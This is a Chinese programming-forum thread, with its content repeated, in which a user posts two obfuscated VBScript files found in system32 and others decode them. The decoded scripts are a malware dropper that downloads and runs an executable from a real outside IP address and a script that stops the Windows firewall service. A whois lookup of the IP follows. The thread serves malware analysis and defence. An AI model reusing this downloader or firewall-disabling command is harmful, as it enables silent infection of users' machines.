计算机上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
在system32文件夹下:
文件1:run.vbs
内容:
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
------解决方案--------------------
。。。路过,节分
------解决方案--------------------
------解决方案--------------------
------解决方案--------------------
run1.vbs
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile oky.exe,2
wscript.sleep 10000
oshell.run oky.exe
run2.vbs
set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0
------解决方案--------------------
Using 30+ day old [STALE - being deleted now] cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.11.0.0 - 218.12.255.255
netname: UNICOM-HE
country: CN
descr: China Unicom Hebei province network
descr: China Unicom
admin-c: CH1302-AP
tech-c: KL984-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
在system32文件夹下:
文件1:run.vbs
内容:
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
------解决方案--------------------
。。。路过,节分
------解决方案--------------------
------解决方案--------------------
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell
?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80)
Microsoft.XMLHTTP
?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
GET http://218.11.0.167:8080/1.exe 0
?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109)
ADODB.Stream
?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oky.exe 2
?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
10000
?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
oky.exe
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell
?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
net stop sharedaccess 0
?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
%windir%\run.vbs 0
------解决方案--------------------
run1.vbs
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile oky.exe,2
wscript.sleep 10000
oshell.run oky.exe
run2.vbs
set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0
------解决方案--------------------
Using 30+ day old [STALE - being deleted now] cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.11.0.0 - 218.12.255.255
netname: UNICOM-HE
country: CN
descr: China Unicom Hebei province network
descr: China Unicom
admin-c: CH1302-AP
tech-c: KL984-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM